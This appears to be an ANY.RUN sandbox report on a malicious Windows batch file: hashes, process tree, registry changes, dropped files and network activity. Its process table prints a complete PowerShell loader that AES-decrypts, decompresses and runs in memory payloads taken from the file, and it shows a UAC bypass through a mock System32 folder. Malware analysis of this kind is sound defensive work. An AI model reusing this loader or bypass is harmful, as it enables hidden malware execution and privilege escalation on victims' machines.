File name: | 3cb4d9bb4d3100fb7884a96c4c1cc4ffe4994c76e80626e2ca4894a01cb6ded2.bat |
Full analysis: | https://app.any.run/tasks/a6791bad-7f35-4717-bdcc-0d9023639181 |
Verdict: | Malicious activity |
Analysis date: | May 24, 2024, 18:44:03 |
OS: | Windows 10 Professional (build: 19045, 64 bit) |
Indicators: | |
MIME: | text/x-msdos-batch |
File info: | DOS batch file, ASCII text, with very long lines (58340), with CRLF line terminators |
MD5: | 81E3209CF09A8F2F59C94C3E8C20C475 |
SHA1: | 0E05DFA84C0F053AB8F2FC4682FB46E02440096F |
SHA256: | 3CB4D9BB4D3100FB7884A96C4C1CC4FFE4994C76E80626E2CA4894A01CB6DED2 |
SSDEEP: | 6144:xlN/X/N7ZeoXGyzjFk7ecPTja3UIhdcYGuukwEZrWAFhF7EP4:zNf1H2yzjFk7e6ToUmdcYFukwE5Wyh6w |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
6208 | C:\WINDOWS\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\3cb4d9bb4d3100fb7884a96c4c1cc4ffe4994c76e80626e2ca4894a01cb6ded2.bat" " | C:\Windows\System32\cmd.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
6216 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
6268 | C:\WINDOWS\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PB3G/iXD5R10HYv1dkYf6wvlc6H16dkTeRAJtBSn4LU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LsLXFtmysUAoPLv6r6Ueaw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $puoml=New-Object System.IO.MemoryStream(,$param_var); $JwzSg=New-Object System.IO.MemoryStream; $swRQi=New-Object System.IO.Compression.GZipStream($puoml, [IO.Compression.CompressionMode]::Decompress); $swRQi.CopyTo($JwzSg); $swRQi.Dispose(); $puoml.Dispose(); $JwzSg.Dispose(); $JwzSg.ToArray();}function execute_function($param_var,$param2_var){ $OFffA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $wgpwT=$OFffA.EntryPoint; $wgpwT.Invoke($null, $param2_var);}$VTLPA = 'C:\Users\admin\AppData\Local\Temp\3cb4d9bb4d3100fb7884a96c4c1cc4ffe4994c76e80626e2ca4894a01cb6ded2.bat';$host.UI.RawUI.WindowTitle = $VTLPA;$Rstmc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($VTLPA).Split([Environment]::NewLine);foreach ($lJDHS in $Rstmc) { if ($lJDHS.StartsWith('liHqZhZshpaeOVfbWRwH')) { $PDXzy=$lJDHS.Substring(20); break; }}$payloads_var=[string[]]$PDXzy.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); " | C:\Windows\System32\cmd.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
6276 | "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 4294967295 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
6480 | "C:\Windows \System32\ComputerDefaults.exe" "C:\Users\admin\AppData\Local\Temp\3cb4d9bb4d3100fb7884a96c4c1cc4ffe4994c76e80626e2ca4894a01cb6ded2.bat" | C:\Windows \System32\ComputerDefaults.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Set Program Access and Computer Defaults Control Panel Exit code: 3221226540 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
6536 | "C:\Windows \System32\ComputerDefaults.exe" "C:\Users\admin\AppData\Local\Temp\3cb4d9bb4d3100fb7884a96c4c1cc4ffe4994c76e80626e2ca4894a01cb6ded2.bat" | C:\Windows \System32\ComputerDefaults.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Set Program Access and Computer Defaults Control Panel Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
6640 | cmd.exe /c call SC.cmd | C:\Windows\SysWOW64\cmd.exe | — | ComputerDefaults.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 1 Version: 10.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
6676 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
|
(PID) Process: | (6276) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
(PID) Process: | (6276) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | IntranetName |
Value: 1 | |||
(PID) Process: | (6276) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
(PID) Process: | (6276) powershell.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 0 | |||
(PID) Process: | (6536) ComputerDefaults.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer |
Operation: | write | Name: | SlowContextMenuEntries |
Value: 6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000 |
PID | Process | Filename | Type | |
---|---|---|---|---|
6276 | powershell.exe | C:\Users\admin\AppData\Local\Temp\SC.bat | text | |
MD5:81E3209CF09A8F2F59C94C3E8C20C475 | SHA256:3CB4D9BB4D3100FB7884A96C4C1CC4FFE4994C76E80626E2CA4894A01CB6DED2 | |||
6276 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive | binary | |
MD5:B305528CA5FDB3A3FB65D285F46E953C | SHA256:59FB207DC632634FA9C2061D5F597988AB5A1F2C0CB9388CC10C6C81FF1F2F94 | |||
6276 | powershell.exe | C:\Windows \System32\MLANG.dll | executable | |
MD5:134E4637B17B5F55AA8A0BE586A3CB4F | SHA256:C3B2425DB3762B1378CF9772A7E6FAF0DE19DD4AE8160AC7325F97FC249075D6 | |||
6276 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_zoevfblc.zwv.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
6276 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_qo3kisnn.brm.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
6276 | powershell.exe | C:\Windows \System32\ComputerDefaults.exe | executable | |
MD5:CFA65B13918526579371C138108A7DDB | SHA256:4C70FEA1C4F9B78955EB840C11C6C81F1D860485E090526A8E8176D98B1BE3D6 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2392 | svchost.exe | GET | 200 | 23.33.242.16:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | unknown |
3688 | SIHClient.exe | GET | 200 | 23.33.242.16:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | unknown |
4680 | SearchApp.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAzlnDD9eoNTLi0BRrMy%2BWU%3D | unknown | — | — | unknown |
3052 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | unknown |
2392 | svchost.exe | GET | 200 | 23.73.138.163:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | unknown |
3688 | SIHClient.exe | GET | 200 | 23.33.242.16:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
4 | System | 192.168.100.255:138 | — | — | — | unknown |
— | — | 23.73.138.57:443 | — | Akamai International B.V. | GB | unknown |
— | — | 23.73.138.131:443 | — | Akamai International B.V. | GB | unknown |
4364 | svchost.exe | 239.255.255.250:1900 | — | — | — | unknown |
2392 | svchost.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown |
1744 | RUXIMICS.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown |
5140 | MoUsoCoreWorker.exe | 40.127.240.158:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown |
2392 | svchost.exe | 23.73.138.163:80 | crl.microsoft.com | Akamai International B.V. | GB | unknown |
2392 | svchost.exe | 23.33.242.16:80 | www.microsoft.com | AKAMAI-AS | US | unknown |
5140 | MoUsoCoreWorker.exe | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
Domain | IP | Reputation |
---|---|---|
settings-win.data.microsoft.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
login.live.com |
| whitelisted |
go.microsoft.com |
| whitelisted |
slscr.update.microsoft.com |
| whitelisted |
fe3cr.delivery.mp.microsoft.com |
| whitelisted |
nexusrules.officeapps.live.com |
| whitelisted |
client.wns.windows.com |
| whitelisted |